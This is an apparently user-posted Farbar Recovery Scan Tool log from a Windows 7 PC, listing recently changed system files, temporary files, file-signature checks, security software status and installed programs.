2014-10-15 13:53 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:53 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:53 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-15 13:53 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:52 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:52 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:52 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:52 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:52 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:52 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:52 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:52 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:52 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:52 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:52 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:52 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:52 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:52 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:52 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:52 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:52 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:52 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:52 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:52 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:52 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:52 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:52 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:51 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:51 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-05 10:00 - 2012-02-12 01:06 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-05 09:43 - 2014-06-28 15:22 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-05 09:20 - 2011-11-26 19:42 - 01302857 _____ () C:\Windows\WindowsUpdate.log
2014-11-05 01:59 - 2013-07-10 12:18 - 00000000 ____D () C:\ProgramData\LogMeIn
2014-11-04 19:52 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 19:52 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 16:34 - 2012-08-08 23:01 - 00000000 ____D () C:\Users\Deborah\AppData\Local\CrashDumps
2014-11-04 16:02 - 2012-02-11 21:13 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-04 16:01 - 2012-02-11 21:13 - 00003498 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-11-04 16:01 - 2012-02-11 21:13 - 00003448 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-11-04 16:01 - 2012-02-11 21:13 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-11-03 20:05 - 2014-01-21 14:19 - 00001015 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-11-03 20:05 - 2014-01-21 14:19 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-11-03 20:04 - 2013-07-10 12:18 - 00000000 ____D () C:\Program Files (x86)\LogMeIn
2014-11-03 19:55 - 2013-07-10 12:19 - 00035688 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll
2014-11-03 19:55 - 2013-07-10 12:18 - 00107392 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2014-11-03 19:55 - 2013-07-10 12:18 - 00092520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2014-11-03 18:57 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-03 18:52 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-02 17:49 - 2012-02-11 21:11 - 00000000 ____D () C:\Users\Deborah
2014-10-31 05:03 - 2013-07-10 12:22 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-31 04:59 - 2011-11-26 20:04 - 00000000 ____D () C:\Program Files\Google
2014-10-31 04:59 - 2011-11-26 20:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-31 04:23 - 2012-02-11 21:25 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Google
2014-10-31 04:23 - 2011-11-26 20:04 - 00000000 ____D () C:\ProgramData\Google
2014-10-27 11:35 - 2014-06-28 15:22 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 09:54 - 2012-02-12 01:08 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 09:53 - 2014-03-31 08:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 09:53 - 2012-07-23 09:18 - 00000000 ___HD () C:\$AVG
2014-10-16 08:33 - 2009-07-13 23:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 03:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:33 - 2009-07-13 23:45 - 00455760 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:30 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 02:07 - 2014-06-28 15:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:00 - 2012-02-11 22:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Some content of TEMP:
====================
C:\Users\Deborah\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Deborah\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-05 00:37

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-05 10:41:15
Running from C:\Users\Deborah\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - Lenovo)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.44 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5315 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5315 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM-x32\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.4.1.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version: - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
Citrix Presentation Server Client - Web Only (HKLM-x32\...\{E9459BCF-0982-498B-ABA7-26C34323493F}) (Version: 10.200.2650 - Citrix Systems, Inc.)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
D-Link DWA-125 (HKLM-x32\...\{E45CACFE-0576-4375-A84F-C34B99A7B652}) (Version: - D-Link)
EaseUS Todo Backup Free 4.0 (HKLM-x32\...\EaseUS Todo Backup Free 4.0_is1) (Version: 4.0.0.1 - CHENGDU YIWO Tech Development Co., Ltd)
Free PDF to Word Converter 5.1.0.383 (HKLM\...\Free PDF to Word Converter_is1) (Version: 5.1.0.383 - Smart Soft)
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
HP Officejet 6500 E710a-f Basic Device Software (HKLM\...\{EC21DBC6-C760-463D-8866-BFACBB28A3E3}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710a-f Help (HKLM-x32\...\{037CD593-D760-4A00-B030-7BBAFA1123FE}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6500 E710n-z Basic Device Software (HKLM\...\{ADDF4B84-5D28-4EAE-8511-EF808C8BC81C}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710n-z Help (HKLM-x32\...\{130E5108-547F-4482-91EE-F45C784E08C7}) (Version: 140.0.2.2 - Hewlett Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1872 - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version: - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.5 - Intel)
Intel® Active Management Technology (HKLM\...\MESOL) (Version: - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Mouse Suite (HKLM\...\MouseSuite98) (Version: 6.45 - Lenovo)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
LogMeIn (HKLM-x32\...\{CB7AF84A-1B7F-4C6B-8A58-EB7CDE48C23A}) (Version: 4.1.3268 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARDR) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
